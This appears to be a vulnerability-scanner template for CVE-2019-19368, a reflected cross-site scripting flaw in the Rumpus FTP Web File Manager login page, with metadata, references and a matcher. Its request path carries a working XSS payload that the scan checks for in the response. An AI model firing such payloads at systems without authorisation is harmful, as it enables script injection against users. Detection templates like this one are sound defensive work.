44 lines
1.4 KiB
YAML
44 lines
1.4 KiB
YAML
id: CVE-2019-19368
|
|
|
|
info:
|
|
name: Rumpus FTP Web File Manager 8.2.9.1 - Cross-Site Scripting
|
|
author: madrobot
|
|
severity: medium
|
|
description: Rumpus FTP Web File Manager 8.2.9.1 contains a reflected cross-site scripting vulnerability via the Login page. An attacker can send a crafted link to end users and can execute arbitrary JavaScript.
|
|
remediation: |
|
|
Upgrade to the latest version of Rumpus FTP Web File Manager or apply the vendor-provided patch to mitigate this vulnerability.
|
|
reference:
|
|
- https://github.com/harshit-shukla/CVE-2019-19368/
|
|
- https://www.maxum.com/Rumpus/Download.html
|
|
- http://packetstormsecurity.com/files/155719/Rumpus-FTP-Web-File-Manager-8.2.9.1-Cross-Site-Scripting.html
|
|
- https://nvd.nist.gov/vuln/detail/CVE-2019-19368
|
|
classification:
|
|
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N
|
|
cvss-score: 6.1
|
|
cve-id: CVE-2019-19368
|
|
cwe-id: CWE-79
|
|
epss-score: 0.00625
|
|
epss-percentile: 0.76278
|
|
cpe: cpe:2.3:a:maxum:rumpus:8.2.9.1:*:*:*:*:*:*:*
|
|
metadata:
|
|
max-request: 1
|
|
vendor: maxum
|
|
product: rumpus
|
|
tags: xss,ftp,packetstorm,cve,cve2019
|
|
|
|
http:
|
|
- method: GET
|
|
path:
|
|
- "{{BaseURL}}/Login?!'><sVg/OnLoAD=alert`1337`//"
|
|
|
|
matchers-condition: and
|
|
matchers:
|
|
- type: word
|
|
part: body
|
|
words:
|
|
- "value=''><sVg/OnLoAD=alert`1337`//'>"
|
|
|
|
- type: status
|
|
status:
|
|
- 200
|